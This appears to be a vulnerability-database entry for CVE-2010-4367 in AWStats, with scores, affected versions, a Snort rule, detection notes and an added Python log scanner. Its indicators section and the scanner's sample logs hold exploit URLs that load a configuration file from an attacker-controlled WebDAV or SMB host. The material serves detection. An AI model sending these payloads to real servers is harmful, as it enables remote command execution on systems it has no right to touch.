CVE-2010-4367
published 2010-12-02


Priority P268 high · 7.5 CVSS 2.0 · AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 27.67% (97.8th percentile)
awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server.

Affected

38 ranges

Vendor | Product | Version range | Fixed in
awstats | awstats | <= 6.95 |

Detection & IOCs (extracted from sources)

url: http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav
url: http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share
path: /cgi-bin/awstats.cgi
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt"; flow:established,to_server; http.uri; content:"awstats.cgi"; nocase; content:"config="; nocase; content:"pluginmode=rawlog"; nocase; content:"configdir=|5C 5C|"; nocase; fast_pattern; reference:bid,45123; reference:cve,2010-4367; classtype:web-application-attack; sid:2012393; rev:4; metadata:created_at 2011_03_01, cve CVE_2010_4367, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_13;)
bytes: |5C 5C|
  • Look for HTTP requests to awstats.cgi containing both 'pluginmode=rawlog' and 'configdir=\\' (UNC path prefix, bytes 5C 5C) in the URI — this is the canonical exploit pattern for CVE-2010-4367 targeting WebDAV/SMB shares.
  • The attack requires three URL parameters to be present simultaneously: config=<arbitrary>, pluginmode=rawlog, and configdir=\\<attacker-controlled-host>\<share>. Alerting on any URI containing all three is high-fidelity.
  • Two distinct transport variants exist: WebDAV over port 80 (configdir=\\host:80\webdav) targeting Windows XP + Apache Tomcat, and SMB (configdir=\\host\share) targeting Windows 2003/XP. Monitor for both UNC path styles in web server logs.
  • Exploitation is primarily Windows-specific (WebDAV/SMB UNC paths). On Linux, the attack is not straightforwardly reproducible without non-default automount configuration, making the impact significantly lower on Linux deployments.
  • The Emerging Threats Snort rule (sid:2012393) specifically targets the UNC-path variant of the exploit; Linux-based configdir path traversal attacks (local filesystem) would not be caught by this signature alone.
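
The detection notes above, applied to web server logs. This is an added example, not code from the page or from the AWStats or Emerging Threats projects. It goes slightly beyond the signature by percent-decoding the query (so `%5C%5C` is caught) and by separately flagging any request that supplies `configdir` at all. The log lines are constructed, and the function names and verdict labels are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache combined-log style), not real traffic.
SAMPLE_LOG = [
    r'203.0.113.7 - - [02/Dec/2010:10:00:01 +0000] "GET /cgi-bin/awstats.cgi?config=x&pluginmode=rawlog&configdir=\\198.51.100.9:80\webdav HTTP/1.1" 200 512',
    r'203.0.113.7 - - [02/Dec/2010:10:00:05 +0000] "GET /cgi-bin/AWStats.cgi?config=x&PluginMode=rawlog&configdir=%5c%5c198.51.100.9%5Cshare HTTP/1.1" 200 512',
    r'192.0.2.10 - - [02/Dec/2010:10:01:00 +0000] "GET /cgi-bin/awstats.cgi?config=www.example.com HTTP/1.1" 200 9000',
    r'192.0.2.44 - - [02/Dec/2010:10:02:00 +0000] "GET /cgi-bin/awstats.cgi?config=x&configdir=/tmp/conf HTTP/1.1" 200 300',
]

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(uri):
    """Return a verdict label (hypothetical names) for one request URI, or None."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("awstats.cgi"):
        return None
    # parse_qs percent-decodes values; keys are lowercased to mirror the rule's nocase.
    query = parse_qs(parts.query, keep_blank_values=True)
    params = {key.lower(): values[-1] for key, values in query.items()}
    configdir = params.get("configdir")
    if configdir is None:
        return None
    # All three parameters present and configdir begins with a UNC prefix (bytes 5C 5C).
    if ("config" in params
            and params.get("pluginmode", "").lower() == "rawlog"
            and configdir.startswith("\\\\")):
        return "unc-exploit-pattern"
    # configdir without a UNC path: not covered by sid:2012393, still worth review.
    return "configdir-present"


def scan(lines):
    """Return (line_number, verdict) for every log line that needs attention."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```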

CVSS provenance

nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P
osv | 7.5 | HIGH
vendor_debian | 7.5 | LOW